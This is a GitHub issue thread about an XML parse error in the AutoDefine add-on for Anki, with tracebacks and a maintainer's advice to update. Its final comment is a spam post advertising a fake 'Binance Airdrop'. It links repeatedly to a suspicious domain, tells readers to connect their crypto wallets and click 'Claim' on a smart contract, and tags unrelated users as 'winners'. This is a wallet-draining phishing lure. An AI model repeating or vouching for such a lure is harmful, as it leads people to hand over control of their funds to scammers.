### ISSUE TITLE
AutoDefineAddon/core.py", line 184 error

### ISSUE THREAD

**Issue by qslid** [z1lc/AutoDefine#16]
I have error in addon. 

Traceback (most recent call last):
  File "/home/fin/.local/share/Anki2/addons/AutoDefineAddon/core.py", line 184, in <lambda>
    editor._addButton("AutoDefine", lambda ed=editor: get_definition(ed),
  File "/home/lina/.local/share/Anki2/addons/AutoDefineAddon/core.py", line 55, in get_definition
    etree = ET.fromstring(urllib2.urlopen(url).read())
  File "xml/etree/ElementTree.py", line 1301, in XML
  File "xml/etree/ElementTree.py", line 1643, in feed
  File "xml/etree/ElementTree.py", line 1507, in _raiseerror
xml.etree.ElementTree.ParseError: syntax error: line 1, column 0

Can you help me with this error?

**Comment by z1lc** [comment]
What were the contents of the first field when this exception occurred?

**Comment by z1lc** [comment]
Closing due to inactivity. Please re-open if you are able to post the contents of the first field that let to this error.

**Comment by qslid** [comment]
Sorry for waiting. 
I tried the AutoDefine for word "extensive". 
![2018-11-11 19-41-50](https://user-images.githubusercontent.com/16439418/48313089-1efff900-e5ea-11e8-809f-049c31bd3f40.png)

**Comment by z1lc** [comment]
It looks like you have an outdated version of AutoDefine installed. Please update it by going to Tools > Add-ons > Check for Updates within Anki.

**Comment by sudorich** [comment]
I am getting similar error in MAC .. looks like the plugin works properly in Windows but not in Linux or Mac. 
![image](https://user-images.githubusercontent.com/31777901/53774550-fd8a8c00-3ebc-11e9-9160-c3fc2e244911.png)

**Comment by ibdcdev** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

Winners: @futandrew, @liuzhenqi77, @mengguang, @colimba, @Karan9034, @vikasm0418, @hardik-dadhich, @hacktfj, @aissat, @ar-anvd
